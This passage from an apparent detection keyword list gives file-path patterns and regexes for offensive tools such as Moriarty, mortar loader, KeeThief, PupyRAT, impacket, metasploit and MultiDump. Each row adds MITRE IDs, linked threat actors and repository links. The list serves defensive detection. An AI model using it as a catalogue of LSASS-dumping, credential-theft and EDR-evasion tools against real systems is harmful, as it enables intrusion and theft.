environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","16655" "*\Moriarty.exe*",".{0,1000}\\Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16656" "*\Morocco-RAT *.exe*",".{0,1000}\\Morocco\-RAT\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16657" "*\mortar\Lib\shell_loader.pas*",".{0,1000}\\mortar\\Lib\\shell_loader\.pas.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive.
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","16658" "*\mortar-loader.html*",".{0,1000}\\mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","16659" "*\MostPopularPasswords.txt*",".{0,1000}\\MostPopularPasswords\.txt.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16660" "*\Mouse Overheat.exe*",".{0,1000}\\Mouse\sOverheat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16661" "*\mouselogger.py*",".{0,1000}\\mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - 
T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16662" "*\MoveMouse.exe*",".{0,1000}\\MoveMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16663" "*\mqtt_check.py*",".{0,1000}\\mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16664" "*\mremoteng.py*",".{0,1000}\\mremoteng\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16667" "*\mremoteng-decrypt\*",".{0,1000}\\mremoteng\-decrypt\\.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","16668" "*\ms17-010.py*",".{0,1000}\\ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16669" "*\msfdb.bat.erb*",".{0,1000}\\msfdb\.bat\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16670" "*\msfnonstaged.exe*",".{0,1000}\\msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16671" "*\msfremove.ps1*",".{0,1000}\\msfremove\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16672" "*\MSFRottenPotato.cpp*",".{0,1000}\\MSFRottenPotato\.cpp.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16673" "*\MSFRottenPotato.h*",".{0,1000}\\MSFRottenPotato\.h.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","16674" "*\MSFRottenPotato.log*",".{0,1000}\\MSFRottenPotato\.log.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the 
RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16675" "*\MSFRottenPotato.sln*",".{0,1000}\\MSFRottenPotato\.sln.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16676" "*\MSFRottenPotatoTestHarness.*",".{0,1000}\\MSFRottenPotatoTestHarness\..{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","16677" "*\msfstaged.exe*",".{0,1000}\\msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16678" "*\msfupdate.bat*",".{0,1000}\\msfupdate\.bat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16679" "*\msfupdate.log*",".{0,1000}\\msfupdate\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16680" "*\msfupdate.ps1*",".{0,1000}\\msfupdate\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16681" "*\msfvenom.bat*",".{0,1000}\\msfvenom\.bat.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16682" "*\msfwrapper.bat*",".{0,1000}\\msfwrapper\.bat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","16683" "*\Mshikaki.cpp*",".{0,1000}\\Mshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","16684" "*\msi_search.c*",".{0,1000}\\msi_search\.c.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16685" "*\msi_search.exe*",".{0,1000}\\msi_search\.exe.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI 
repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16686" "*\msi_search.ps1*",".{0,1000}\\msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16687" "*\msi_search.x64.o*",".{0,1000}\\msi_search\.x64\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16688" "*\msi_search.x86.o*",".{0,1000}\\msi_search\.x86\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","16689" "*\msol.py*",".{0,1000}\\msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large 
Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16690" "*\MSOL\DomainCompanyInfo.txt*",".{0,1000}\\MSOL\\DomainCompanyInfo\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","16691" "*\mssprinkler.ps1*",".{0,1000}\\mssprinkler\.ps1.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","16696" "*\mssql_priv.py*",".{0,1000}\\mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16697" "*\MSSQL-Clear-Text-Password-*.txt*",".{0,1000}\\MSSQL\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16698" "*\mssqlclient.py*",".{0,1000}\\mssqlclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16699" "*\mssqlinstance.py*",".{0,1000}\\mssqlinstance\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16700" "*\MSSQL-NTLMv1-Client-*.txt*",".{0,1000}\\MSSQL\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16701" "*\MSSQL-NTLMv2-Client-*.txt*",".{0,1000}\\MSSQL\-NTLMv2\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16702" "*\mstscfox.dll*",".{0,1000}\\mstscfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16703" "*\MultiDump.c*",".{0,1000}\\MultiDump\.c.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16704" "*\MultiDump.exe*",".{0,1000}\\MultiDump\.exe.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","16705" "*\MultiDump.exe*",".{0,1000}\\MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16706" "*\MultiDump.sln*",".{0,1000}\\MultiDump\.sln.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and 
extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16707" "*\MultiDump.vcxproj*",".{0,1000}\\MultiDump\.vcxproj.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","16708" "*\MutationGate.cpp*",".{0,1000}\\MutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16710" "*\MutationGate.exe*",".{0,1000}\\MutationGate\.exe.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16711" "*\MutationGate.sln*",".{0,1000}\\MutationGate\.sln.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16712" 
